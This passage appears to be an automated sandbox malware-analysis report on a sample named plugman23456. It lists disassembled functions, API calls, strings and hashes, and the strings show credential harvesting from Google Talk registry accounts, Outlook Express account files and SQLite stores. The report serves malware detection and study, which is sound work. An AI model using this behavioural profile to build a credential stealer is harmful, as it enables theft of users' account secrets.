                          Similarity
                          • API ID: _mbscatmemset$Close_mbscpystrlen
                          • String ID: InstallPath$Software\Group Mail$fb.dat
                          • API String ID: 3071782539-966475738
                          • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                          • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                          • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                          • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                          Function 00408DB6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 442 408db6-408dbd 443 408dc4-408dd0 442->443 444 408dbf call 408d34 442->444 446 408de2 443->446 447 408dd2-408ddb 443->447 444->443 450 408de4-408de6 446->450 448 408e0d-408e1c 447->448 449 408ddd-408de0 447->449 448->450 449->446 449->447 451 408f07 450->451 452 408dec-408df2 450->452 453 408f09-408f0b 451->453 454 408df4-408e04 452->454 455 408e1e-408e25 452->455 458 408e05-408e0b 454->458 456 408e27-408e47 _mbscpy call 409240 455->456 457 408e6b-408e7e call 408f0c 455->457 465 408e49-408e59 strlen 456->465 466 408e5b-408e69 456->466 459 408e7f-408e87 LoadStringA 457->459 458->459 464 408e89 459->464 467 408f00-408f05 464->467 468 408e8b-408e9a 464->468 465->464 465->466 466->458 467->453 468->467 469 408e9c-408ea8 468->469 469->467 470 408eaa-408efe memcpy 469->470 470->451 470->467
                          APIs
                          • _mbscpy.MSVCRT ref: 00408E31
                            • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
                          • strlen.MSVCRT ref: 00408E4F
                          • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                          • memcpy.MSVCRT ref: 00408EBE
                            • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D5C
                            • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D7A
                            • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D98
                            • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408DA8
                          Strings
                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408DCA
                          • strings, xrefs: 00408E27
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                          • API String ID: 4036804644-4125592482
                          • Opcode ID: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                          • Instruction ID: 8088189cea062d7f30cfe1d816b9e84d6c9af13e32ba145f50863190e1f773ff
                          • Opcode Fuzzy Hash: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                          • Instruction Fuzzy Hash: 4B3170B1101722AFD715DB15ED41E733766E7803067124A3FE981972A3CB39E8A1CB9E
                          Function 00410863 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                          Download Yara Rule
                          APIs
                          • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                          • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                          • memcpy.MSVCRT ref: 004108C3
                          • CoTaskMemFree.OLE32(?), ref: 004108D2
                          Strings
                          • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                          • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FromStringUuid$FreeTaskmemcpy
                          • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                          • API String ID: 1640410171-3316789007
                          • Opcode ID: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                          • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                          • Opcode Fuzzy Hash: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                          • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                          Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                          • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                          • SetFilePointer.KERNELBASE(00000000,00000002,00000000,00000000,?), ref: 004441D1
                            • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                            • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                            • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                            • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                            • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                            • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                            • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                          • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                          • CloseHandle.KERNELBASE(?), ref: 00444206
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                          • String ID: ACD
                          • API String ID: 1886237854-620537770
                          • Opcode ID: e6911fb76e44905f99aae04da62e88cbef3e0e1df9b19c178b82a06b9eab0b64
                          • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                          • Opcode Fuzzy Hash: e6911fb76e44905f99aae04da62e88cbef3e0e1df9b19c178b82a06b9eab0b64
                          • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                          Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                          • String ID:
                          • API String ID: 2054149589-0
                          • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                          • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                          • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                          • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                          Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                            • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                            • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                          • memset.MSVCRT ref: 00408620
                            • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                          • memset.MSVCRT ref: 00408671
                          • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                          • RegCloseKey.ADVAPI32(?), ref: 004086D6
                          Strings
                          • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                          • String ID: Software\Google\Google Talk\Accounts
                          • API String ID: 1366857005-1079885057
                          • Opcode ID: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                          • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                          • Opcode Fuzzy Hash: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                          • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                          Function 00410DBB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                            • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                          • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                          • memset.MSVCRT ref: 00410E10
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                          • _mbscpy.MSVCRT ref: 00410E87
                            • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                          Strings
                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersion_mbscpymemset
                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                          • API String ID: 3929982141-2036018995
                          • Opcode ID: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                          • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                          • Opcode Fuzzy Hash: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                          • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                          Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Cursor_mbsicmpqsort
                          • String ID: /nosort$/sort
                          • API String ID: 882979914-1578091866
                          • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                          • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                          • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                          • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                          Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 004109F7
                            • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                            • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                          • memset.MSVCRT ref: 00410A32
                          • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PrivateProfileStringmemset$Writememcpysprintf
                          • String ID:
                          • API String ID: 3143880245-0
                          • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                          • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                          • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                          • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                          Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@
                          • String ID:
                          • API String ID: 1033339047-0
                          • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                          • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                          • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                          • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                          Function 00402A14 Relevance: 4.5, APIs: 3, Instructions: 49registryCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00402A34
                            • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                          • RegCloseKey.KERNEL32(?,?,?), ref: 00402A7A
                          • RegCloseKey.KERNEL32 ref: 00402A95
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Close$Enummemset
                          • String ID:
                          • API String ID: 1615280680-0
                          • Opcode ID: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                          • Instruction ID: 4e227b58271400dae14a407a15e496f509ceac9baab3320f2be5fe13b191b239
                          • Opcode Fuzzy Hash: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                          • Instruction Fuzzy Hash: D10179B590000CFFEB21EF51CD81EEA776DDF50388F100076BA84A1051E6759E959A64
                          Function 00406F30 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@mallocmemcpy
                          • String ID:
                          • API String ID: 3831604043-0
                          • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                          • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                          • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                          • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                          Function 00410B1E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                            • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                          • RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: sqlite3.dll
                          • API String ID: 3677997916-1155512374
                          • Opcode ID: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                          • Instruction ID: 87b963fc64edc678a4f0440c700721264c86d0e3755c9c93a3ce53f579e10251
                          • Opcode Fuzzy Hash: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                          • Instruction Fuzzy Hash: 3DE0C972A00119BBDF11AF91DD06ADA7BA9EF14298B000061FD0591221E776DEA4EAD4
                          Function 00406D01 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID: eBD
                          • API String ID: 823142352-44267735
                          • Opcode ID: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
                          • Instruction ID: a89d01311c626acd6708100a1c920bed7e48ab8185d3fa7f8c0eae74851e3e32
                          • Opcode Fuzzy Hash: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
                          • Instruction Fuzzy Hash: 10C012B0250300BEFF214F10EC46F37355DE740700F300424BE00F40E1C1A14D10C928
                          Function 0044B3CF Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                          Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                            • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                          • _strcmpi.MSVCRT ref: 0040CEC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: strlen$_strcmpimemset
                          • String ID: /stext
                          • API String ID: 520177685-3817206916
                          • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                          • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                          • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                          • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                          Function 0044B40E Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                          Function 00402B22 Relevance: 3.1, APIs: 2, Instructions: 59registryCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00402B44
                            • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                          • RegCloseKey.ADVAPI32 ref: 00402BBD
                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                            • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                            • Part of subcall function 00402A9D: memset.MSVCRT ref: 00402ABC
                            • Part of subcall function 00402A9D: RegCloseKey.ADVAPI32 ref: 00402B17
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Closememset$EnumOpenmemcpystrlen
                          • String ID:
                          • API String ID: 1880195650-0
                          • Opcode ID: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                          • Instruction ID: a6739743e39ca8df578777331d88ee5d3d666d95225ddaf8fc8e93cdb73399e2
                          • Opcode Fuzzy Hash: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                          • Instruction Fuzzy Hash: 4811B975904109EFEB10DF95CD41ED9B77CEF20348F1004BAF988A2151EAB5AAC49B14
                          Function 0044B42B Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                          Function 004029A2 Relevance: 3.0, APIs: 2, Instructions: 48registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                            • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharMultiQueryValueWidememcpystrlen
                          • String ID:
                          • API String ID: 1208763047-0
                          • Opcode ID: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
                          • Instruction ID: 6870f833a154d6718f5b937b5a7666aa62b37853351f5b72213b77096f12c34b
                          • Opcode Fuzzy Hash: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
                          • Instruction Fuzzy Hash: BE0162B2504209FEEB119BA09CC9DABBB6CEB14358F108277F605B51C1DA749E589A28
                          Function 00402A9D Relevance: 3.0, APIs: 2, Instructions: 48registryCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00402ABC
                            • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                          • RegCloseKey.ADVAPI32 ref: 00402B17
                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                            • Part of subcall function 00402A14: memset.MSVCRT ref: 00402A34
                            • Part of subcall function 00402A14: RegCloseKey.KERNEL32 ref: 00402A95
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Closememset$EnumOpen
                          • String ID:
                          • API String ID: 1938129365-0
                          • Opcode ID: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                          • Instruction ID: 075d2aef54253d1e507a5189515eddc1e36b9bc69c6417a4805569c48a28632c
                          • Opcode Fuzzy Hash: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                          • Instruction Fuzzy Hash: E801ACB590010DAFEB20EF95CD85EEAB76CDF2434CF000076F544A1051FBB9AE989B64
                          Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                          • LoadLibraryA.KERNEL32(?), ref: 0040473C
                          • GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadProc
                          • String ID:
                          • API String ID: 145871493-0
                          • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
